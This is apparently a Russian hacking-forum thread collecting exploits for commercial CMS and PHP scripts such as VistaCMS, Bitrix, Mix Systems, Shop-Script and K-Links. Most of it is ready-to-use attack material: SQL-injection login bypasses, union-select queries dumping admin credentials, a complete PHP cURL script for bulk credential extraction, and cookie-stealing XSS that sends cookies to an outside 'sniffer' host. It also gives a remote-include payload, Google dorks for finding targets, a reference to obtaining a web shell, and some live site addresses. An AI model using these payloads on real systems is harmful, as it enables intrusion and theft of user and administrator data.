VistaCMS Оф.сайт: http://www.vistacms.ru Стоимость (в руб.): 13000-42000 ------------------------------------------------ Раскрытие путей: http://www.vistacms.ru/modules/kerne'l/ Code: /usr/home/admin/domains/vistacms.ru/public_html/class/page.class.php SQL-injection Администраторская панель: Code: http://www.vistacms.ru/admin/ Логин: 1' or 1=1/* Пароль: antichat.ru Клиенты: Code: http://www.vistacms.ru/clients/ Автор: ZAMUT (c) P.S. Уязвимость в авторизации, была замечена не везде. С чем это связано не знаю, про версию CMS ничего не говориться.
UMI.CMS Оф.сайт: www.umi-cms.ru Стоимость (в руб.): 2990-29990 ------------------------------------------ XSS(Активная) Настройки -> Уязвимые поля: Фамилия Имя Отчество Code: <script>alert(document.cookie)</script> Автор: ZAMUT (c)
Abo Cms Уязвимость (sql-inj) обнаружена мной в ?модуле статистики? движка ABO CMS, файл c.php находится обычно в корне веб-директории сайта, реально заюзать уязвимость можно в MySQL 4.1 и выше, так как в более ранних версиях нет возможности использовать подзапросы... цена ABO CMS на офф. сайте достигает 30000 рублей. На этом движке работают крупные инет-магазины, банки, и т.д. вот сплоит ТУТ написанный на php для получения логина и хеша пароля первого пользователя... для получения других данных скрипт не сложно модифицировать... Скрипт написан немного корявенько, т.к. писался на скорую руку, так что больно не бейте
S.Builder Разработчик CMS CBS-Group Номер версии S.Builder 3.756 Лицензия платная Сайт www.sbuilder.ru Демо-версия www.demo.sbuilder.ru Функциональность портал Стоимость (в руб.) от 2235 до 44700 руб. для теста в вебе создают акк на сутки SQL-injection 20 полей системная инфа 5.0.22- log::dmsb_d7494517@localhost::dmsb_d7494517 пользователи название не смотрел но мона через базу глянуть
Уязвимости в Bitrix CMS Multiple Vulns in Bitrix CMS Версия системы и история обновления Vulnerable: Bitrix Site Manager 4.1.x Exploit: Code: http://www.bitrix.ru/bitrix/updates/updater.log XSS в редиректе: Уязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу. Раскрытие пути Vulnerable: Bitrix Site Manager 4.0.x Exploit: Code: http://host/bitrix/templates/.default/subscribe/subscr_form.php http://host /bitrix/php_interface/dbquery_error.php PHP Include Vulnerable: Bitrix Site Manager 4.0.x Exploit: Code: http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/ "http://attackhost/" должен содержать скрипт dbconn.php в /bitrix/php_interface/
Amiro.CMS сайт: amiro.ru XSS (passive) Сплоентс: Code: /saleoffset=saleoffset=<script>alert(document.cookie)</script> Code: /blabla<script>alert(document.cookie)</script> by me +)
Mix Systems vendor:http://mixsystems.com.ua price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е." SQL injection plugin:katalog EX Code: http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395' http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+order+by+18/* http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* Code: version::user::database http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* users id::login::pwd::email http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users/* http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/* plugin=photogall Ex Code: http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11 http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+order+by+12/*&cat=11 Code: version::user::database http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11 users id::login::pwd::email http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11 (c) halkfild написал сплоит на CURL /*быстрее чем сокеты*/ PHP: <? echo "\n"; echo "-------------------------Mix Systems CMS--------------------------"."\n"; echo "-----------------------coded by : halkfild------------------------"."\n"; echo "------------------------------------------------------------------"."\n"; if ($argc!=4){ echo " Usage: php ".$argv[0]." host type num_records\n"; echo " host: Your target ex www.target.com \n"; echo " type: 1 - plugin=katalog bug\n"; echo " 2 - plugin=photogall bug\n"; echo " num_records: number or returned records(if 0 - return all)\n"; echo " example: php script.php site.com 10\n"; echo "\n"; exit; } $host=$argv[1]; $type=$argv[2]; $count=$argv[3]; if ($argv[2]==1) { $query="index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+"; $end=",1/*"; } elseif ($argv[2]==2) { $query="index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),5,6,7,8,9,10,11,12+from+ng_users+limit+"; $end=",1/*&cat=11"; } else { echo " incorrect parameter #2=".$argv[2]."\n"; echo " type: 1 - plugin=katalog bug\n"; echo " 2 - plugin=photogall bug\n"; exit; } $site=$host.'/'.$query; $pattern='/@::(\d+)::(.*)::([0-9a-z]{32})::(.*@.*)::@/'; $i=0; if(function_exists('curl_init')) { while(1) { $ch = curl_init("http://".$site.$i.$end); curl_setopt($ch, CURLOPT_HEADER,true); curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,10); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)"); $res=curl_exec($ch); $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE); curl_close($ch); if ($returncode==404) exit ("Vulnerable script not found. Check your site and settings :| \n"); if(preg_match_all($pattern,$res,$out)) { echo "| ".$out[1][0]." | ".$out[2][0]." | ".$out[3][0]." | ".$out[4][0]." |\r\n"; $i++; $out=null; } else break; if ($count!=0 && $i>$count) break; } echo ("Finish. /* ".$i." records*/ \n"); } else exit("Error:Libcurl isnt installed \n"); ?>
SQL inj в Shop-Script Shop-Script Разработчик Articus dev. group Лицензия платная Сайт www.shop-script.ru/ Демо-версия www.demo.shop-script.ru/premium Функциональность e-магазин Стоимость (в руб.) от 0 до 5450 руб. SQL injection уязвимый скрипт invoice_phys.php уязвимый парамерт order_time= данные передаются кодированные в base64; возможен только посимвольный перебор Пример уязвимого куска кода: PHP: $_GET["orderID"] = (int) $_GET["orderID"]; $sql = 'SELECT COUNT(*) FROM '.ORDERS_TABLE.' WHERE orderID='.$_GET["orderID"].' AND order_time="'.base64_decode($_GET["order_time"]).'" AND customer_email="'.base64_decode($_GET["customer_email"]).'"'; Пример: Code: 2008-03-16 14:24:11[COLOR=DarkRed]" or 1=1/*[/COLOR] Рабочий "код": Code: 2008-03-16 14:24:11[COLOR=DarkRed]" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*[/COLOR] который нужно прогнать через base64_encode и передать скрипту. Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dyes%22 Приблизительно 1500 стр... Рабочий скрипт для подбора пароля __http://rapidshare.com/files/100018966/SS_brute.rar.html Уязвимость не где не вылаживал, античат первый))
Smart-CMS showNewsItem.php Exploit: Code: showNewsItem.php?news_id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,admin_id,user_name,password)+from+administrator-- Пассы без шифрования /admin/index.php
тамже showGallery.php?pagetitle=Gallery&category=1+and+1=0+union+select+concat(user_name,0x3a,password)+from+administrator/*
Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability HTML: --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability +==-- --==+====================================================================================+==-- - dreaming of necessity is reason to comply - [+] Info: [~] Bug found by JosS [~] sys-project[at]hotmail.com [~] http://www.spanish-hackers.com/ [~] EspSeC & Hack0wn!. [~] Software: Pre Job Board (payment) [~] HomePage: http://www.preproject.com/ [~] Exploit: Remote SQL Injection [High] [~] Vuln file: JobSearch.php [~] /jobseekers/JobSearch.php (search module) [+] Exploit: [~] ' and 1=2 union all select 1,2,3,4,version(),user(),7,8,9,0,1,2,3,4,5/* * In memory of rgod --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End] # milw0rm.com [2008-06-14] milw0rm.com [2008-06-14]
CNCatXSS: Уязвимости в add.php(можно как через GET тк и через POST),index.php и search.php Code: http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Не уверен, что платная CMS, но тем не менее SQL-inj в Siteframe CMS В скрипте folder.php, параметре id. Code: http://site.com/folder.php?id=[sql] Боевой пример:
K-Links Directory SQL-INJECTION, XSS ================================================================================ || K-Links Directory SQL-INJECTION, XSS ================================================================================ Application: K-Links Directory -------------- Website: http://turn-k.net/k-links ----------- Version: Platinum (All) ---------- About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$. ------ Googledork: Powered By K-Links Directory --------------- Demo: http://klinksdemo.com -------- Date: 24-07-2008 ------- Description: --------------- Множественные SQL-Injection. Активные и пассивные XSS. [ SQL-INJECTION ] http://host/report/-1[SQL] http://host/visit.php?id=-1[SQL] http://host/addreview/-1[SQL] http://host/refer/-1[SQL] ===>>> Exploit: http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/* /* Admin Login - http://host/admin Далее, через Manage Templates получаем веб-шелл. */ [ ACTIVE XSS ] *) На сайте в поиске вбиваем <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script> При просмотре администратором поисковых запросов, его cookies уйдут на сторонний ресурс. *) На любую ссылку можно оставить мнение. После чего это сообщение появится у администратора. [ PASSIVE XSS ] http://host/index.php?req=login&redirect=&login_message=<script>alert()</script> Author: Corwin --------- Contact: corwin88[dog]mail[dot]ru ----------- p.s. к сожалению не удалось найти скрипты и провести нормальный аудит кода.
================================================================================ || Dating 3 PHP Script SQL-INJECTION ================================================================================ Application: E-topbiz Dating 3 PHP Script ------------ Version: All -------- Website: http://e-topbiz.com/oprema/pages/dating3.php -------- Demo: http://e-topbiz.com/trafficdemos/dating3 ----- About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site. ------ Date: 01-08-2008 ----- [ VULNERABLE CODE ] members/mail.php @Line: PHP: 142: if($action==inbox) { 143: $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it"); 150: if($action==veiw) { 151: $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it"); ===>>> Exploit: http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/* Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru --------
============================ || PPVCHAT ACTIVE XSS ============================ Application: PPVCHAT ------------ Website: http://ppvchat.com/ -------- Version: All -------- About: Pay-per-view adult video chat software. Price 999$. ------ Googledork: Copyright © 2006 PPVChat.com ----------- Date: 05-07-2008 ----- Description: ------------ При регистрации новых пользователей/моделей нет фильтрации полей. ===>>> Exploit: <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script> Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru --------
================================================================================ || E-topbiz Payment Processor 2 SQL-INJECTION ================================================================================ Application: E-topbiz Payment Processor 2 ------------ Version: 2.0 -------- Website: http://e-topbiz.com/oprema/pages/pproc2.php -------- Demo: http://e-topbiz.com/trafficdemos/payment2/ ----- About: The payment processor php script allows you to own and operate your very own paypal type payment processor ------ website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site. Date: 01-08-2008 ----- [ SQL-INJECTION ] http://host/shop.htm?cid=-1[SQL] ===>>> Exploit: http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version()) Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru --------
================================================================================ || Recipe Script SQL-INJECTION ================================================================================ Application: Recipe Script ------------ Version: 6.0 -------- Website: http://fivedollarscripts.com -------- Demo: http://recipebag.com ----- Date: 03-08-2008 ----- [ VULNERABLE CODE ] viewrecipe.php PHP: 3: $sql="select * from recipe where recipeid=$recid"; 4: $res=mysql_query($sql);it"); 259: $result=mysql_query("select * from recipescomments where approved='Y' and recipeid=$recid"); 260: if(mysql_num_rows($result))do it"); ===>>> Exploit: http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3,4,5,6,7,8,9 from recipesadmin.php // Admin Login - http:/host/admin2 Greetzz !!! Форб, с отцовством бро! !! Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru --------
================================================================================ || Bartender Drinks SQL-INJECTION ================================================================================ Application: Bartender Drinks ------------ Version: All -------- Website: http://fivedollarscripts.com -------- Demo: http://fivedollarscripts.com/drinks/ ----- Date: 04-08-2008 ----- [ VULNERABLE CODE ] viewdrinks.php PHP: 6: if($bgid=="") { $sql="select * from drink order by upldate desc"; } else { 12: $sql="select * from drink where categoryid=$bgid order by upldate desc"; } viewdrink.php PHP: 3: $sql="select * from drink where drinkid=$recid"; $res=mysql_query($sql); 238: $result=mysql_query("select * from drinkscomments where approved='Y' and drinkid=$recid"); ===>>> Exploit: http://host/index.php?cmd=6&recid=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3 from drinksadmin/* // Admin Login - http:/host/admin2 by me
